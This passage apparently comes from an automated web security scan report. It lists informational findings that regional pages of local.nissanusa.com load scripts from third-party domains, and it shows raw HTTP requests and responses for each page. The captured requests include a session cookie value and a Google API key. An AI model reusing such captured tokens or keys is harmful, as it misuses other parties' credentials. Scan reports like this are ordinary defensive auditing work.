Connection: Transfer-Encoding
Set-Cookie: localZIP=44101; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Set-Cookie: localDMA=cleveland-area; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Content-Length: 116578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.220. http://local.nissanusa.com/columbus-oh-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /columbus-oh-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /columbus-oh-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=43215; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Set-Cookie: localDMA=columbus-oh-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Content-Length: 116057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.221. http://local.nissanusa.com/dallas-ft-worth-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /dallas-ft-worth-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dallas-ft-worth-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=75201; expires=Sat, 05-Feb-2011 04:53:19 GMT; path=/
Set-Cookie: localDMA=dallas-ft-worth-area; expires=Sat, 05-Feb-2011 04:53:19 GMT; path=/
Content-Length: 118245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.222. http://local.nissanusa.com/denver-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /denver-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /denver-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=80201; expires=Sat, 05-Feb-2011 04:54:11 GMT; path=/
Set-Cookie: localDMA=denver-area; expires=Sat, 05-Feb-2011 04:54:11 GMT; path=/
Content-Length: 115525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.223. http://local.nissanusa.com/harlingen-brownsville-tx-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /harlingen-brownsville-tx-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /harlingen-brownsville-tx-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=78550; expires=Sat, 05-Feb-2011 04:54:14 GMT; path=/
Set-Cookie: localDMA=harlingen-brownsville-tx-area; expires=Sat, 05-Feb-2011 04:54:14 GMT; path=/
Content-Length: 104990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.224. http://local.nissanusa.com/harrisburg-lancaster-pa-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /harrisburg-lancaster-pa-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /harrisburg-lancaster-pa-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=17101; expires=Sat, 05-Feb-2011 04:52:55 GMT; path=/
Set-Cookie: localDMA=harrisburg-lancaster-pa-area; expires=Sat, 05-Feb-2011 04:52:55 GMT; path=/
Content-Length: 166681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.225. http://local.nissanusa.com/hartford-new-haven-ct-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /hartford-new-haven-ct-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hartford-new-haven-ct-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=06101; expires=Sat, 05-Feb-2011 04:53:01 GMT; path=/
Set-Cookie: localDMA=hartford-new-haven-ct-area; expires=Sat, 05-Feb-2011 04:53:01 GMT; path=/
Content-Length: 203647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.226. http://local.nissanusa.com/honolulu-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /honolulu-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /honolulu-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=96801; expires=Sat, 05-Feb-2011 04:57:29 GMT; path=/
Set-Cookie: localDMA=honolulu-area; expires=Sat, 05-Feb-2011 04:57:29 GMT; path=/
Content-Length: 107900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.227. http://local.nissanusa.com/houston-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /houston-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /houston-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=77001; expires=Sat, 05-Feb-2011 04:53:28 GMT; path=/
Set-Cookie: localDMA=houston-area; expires=Sat, 05-Feb-2011 04:53:28 GMT; path=/
Content-Length: 114259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.228. http://local.nissanusa.com/indianapolis-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /indianapolis-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /indianapolis-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:52:08 GMT
Set-Cookie: localZIP=46201; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Set-Cookie: localDMA=indianapolis-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Content-Length: 111740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.229. http://local.nissanusa.com/jacksonville-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /jacksonville-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jacksonville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=32201; expires=Sat, 05-Feb-2011 04:56:16 GMT; path=/
Set-Cookie: localDMA=jacksonville-area; expires=Sat, 05-Feb-2011 04:56:16 GMT; path=/
Content-Length: 116343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.230. http://local.nissanusa.com/las-vegas-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /las-vegas-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /las-vegas-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=89101; expires=Sat, 05-Feb-2011 04:56:53 GMT; path=/
Set-Cookie: localDMA=las-vegas-area; expires=Sat, 05-Feb-2011 04:56:53 GMT; path=/
Content-Length: 107986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.231. http://local.nissanusa.com/little-rock-pine-bluff-ar-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /little-rock-pine-bluff-ar-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /little-rock-pine-bluff-ar-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=72201; expires=Sat, 05-Feb-2011 04:54:18 GMT; path=/
Set-Cookie: localDMA=little-rock-pine-bluff-ar-area; expires=Sat, 05-Feb-2011 04:54:18 GMT; path=/
Content-Length: 109582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.232. http://local.nissanusa.com/los-angeles-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /los-angeles-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /los-angeles-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=90001; expires=Sat, 05-Feb-2011 04:56:37 GMT; path=/
Set-Cookie: localDMA=los-angeles-area; expires=Sat, 05-Feb-2011 04:56:37 GMT; path=/
Content-Length: 153308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.233. http://local.nissanusa.com/louisville-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /louisville-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /louisville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
